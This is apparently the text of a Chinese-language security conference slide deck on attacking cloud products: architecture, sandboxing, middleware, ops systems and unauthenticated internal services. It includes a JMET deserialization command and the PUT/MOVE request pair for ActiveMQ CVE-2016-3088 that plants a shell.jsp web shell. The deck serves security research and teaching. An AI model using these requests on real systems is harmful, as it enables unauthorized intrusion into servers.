Hacking Cloud Product [ Demon@n0tr00t ] 探索⼀一切、攻破⼀一切 [ Hacker@KCon ] About me • Working  on  阿里云-云平台安全 • Team  of  n0tr00t  （http://www.n0tr00t.com/） • ID:  Demon  (微博：Demon写Demo)   • 跨界：摇滚乐、Coding、安全 3 Part. 01 分类和架构 4 云的基础架构 • 种类繁多 基础服务大同小异，每家云厂商还有自己的特色云服务   • 资源开放 按需付费、资源开放，对于安全的说法就是可控点变多，结界难以把控，安全的天秤随时会倾斜。 • 木桶原理 木桶原理被放大，致弱点容易成为致命点。 5 云产品的通⽤用架构 网关系统 用户管理 Portal 逻辑服务 监控系统 控制器 计费系统 调度系统 Server 运维管控 API 资源管理 生产系统 运维管理 存储系统 容灾系统 底层云组件 实例 虚拟机 物理集群 6 云产品的安全基⽯石 - 沙箱（SandBox） • 沙箱的结构决定了产品持久稳固性 • 脚本层、容器层、用户权限层            -脚本层：JSM、PHP  disabled  function            -容器层：Docker、Linux  namespace、cgroup            -用户权限隔离：最小权限原则 • avoid  be  root,  use  linux  capability 用户权限 容器层 脚本层 7 Part. 02 隐匿在结界内的隐患 8 结界的划分 结界外 • 控制台（portal）,  用户可管理产品   • API服务，通过API访问操作实例方便自动化 管理实例   • 实例本身，如连接虚拟服务 器,redis,mongodb等 结界内 • • • • • 业务逻辑服务，负责业务逻辑处理 调度服务，负责调配资源，控制链路   生产系统，负责生产实例，或释放实例等 管控系统，用于管理或监控实例 其他：因架构而定，如还存在一些日志组件， 下发任务模块等等 暗物质 • • 未知模块，如一些额外的存储系统 游离在架构之外的服务，结界不明，难以发 现 9 过度松耦合导致的隐患 • 十人传话游戏   •  多层模块分离，安全职责不明 10 攻击中间件服务 ·∙  开源消息中间件：Kafka、ActiveMQ、RabbitMQ、OpenJMS等      ·∙  分布式服务框架：Dubbo、zookeeper、TAF   攻击方式     ·∙  Load  eval  Mbean  via  “getMBeansFromURL”    （http://www.n0tr00t.com/2015/04/16/JMX-RMI-Exploit.html）       ·∙  Java  反序列化漏洞（http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/）       ·∙  XML实体注入、命令注入、未授权调用服务 11 Use  Java  Message  Exploitation  Tool  (JMET)   • Apache  ActiveMQ   • Redhat/Apache  HornetQ   • Oracle  OpenMQ   • IBM  WebSphereMQ   • Pivotal  RabbitMQ   • IIT  Software  SwiftMQ   • Apache  ActiveMQ  Artemis   • Apache  QPID  JMS   • Apache  QPID  Client   项目地址：https://github.com/matthiaskaiser/jmet   使用方法：        >  java  -jar  jmet-0.1.0-all.jar  -Q  event  -I  ActiveMQ  -Y  xterm  127.0.0.1  61616 12 ActiveMQ  CVE-2016-3088 PUT  /fileserver/shell.txt  HTTP/1.1   Host:  x.x.x.x   Content-Length:  16   MOVE  /fileserver/shell.txt  HTTP/1.1   Destination:  file:///usr/local/apache-activemq-5.7.0/webapps/shell.jsp   Host:  x.x.x.x   13 运维管控系统   • 管理控制实例   • 部署发布系统   • 状态监控系统   • 统一配置管理系统   安全隐患：   • ACL绕过、API未授权调用   • 通过XSS漏洞打入到管控系统执行任务   • 开源的管控系统的漏洞（hue、splunk  、cacti、jekins、zabbix、zenoss、elasticsearch  ） 14 Use  hiveSQL  to  read  file 15 内部服务未授权问题   • Redis未授权访问   • Mongodb未授权访问   • Rsync未授权访问   • Memcache未授权访问 16 Part. 03 以点破⾯面-Hacking 17 云服务 18 开源服务 云服务 ⾃自研服务 19 开源服务 20